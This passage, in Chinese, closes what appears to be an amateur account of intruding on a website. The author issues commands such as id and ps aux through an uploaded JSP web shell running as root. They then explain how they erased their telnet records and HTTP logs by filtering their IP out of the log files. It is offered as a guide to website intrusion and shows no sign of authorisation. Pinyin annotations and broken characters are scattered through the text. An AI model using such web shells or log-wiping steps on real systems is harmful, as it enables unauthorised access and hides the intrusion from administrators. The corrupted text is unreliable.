接下去的事情，差點(diǎn)沒(méi)讓我吐血：

我敲了一個(gè):http://target:8080/upload/cmd.jsp?cmd=id

顯示：

uid=0(root)gid=0(xxx)groups=0(xxx),2(xxx),3(xxx),4(xxx),5(xxx),20(xxx),31(xxx)

我的這個(gè)WEB SHELL本來(lái)就是ROOT，真是服了那個(gè)管理員，也服了自己。竟然折騰了這么半天，哎！

http://target:8080/upload/cmd.jsp?cmd=ps+aux

果然是root身份運(yùn)行的（不列出來(lái)了）

剩下來(lái)的事情：

1、刪除我的telnet記錄。

2、刪除http的日志。

至于清除日志嘛，我使用的辦法是：cat xxx 　grep -V "IP" >>temp然后在把temp覆蓋那些被我修改過(guò)的日志文件。

我沒(méi)有更換他的頁(yè)面，因?yàn)槲冶旧硪簿筒皇鞘裁春诳屠�，更不是紅客，只是個(gè)網(wǎng)絡(luò)安全愛(ài)好者而已。所以，發(fā)封郵件告訴system admin吧！

上述的相關(guān)內(nèi)容就是對(duì)黑客攻擊技術(shù) WEB網(wǎng)站入侵的過(guò)程的描述，希望會(huì)給你帶來(lái)一些幫助在此方面。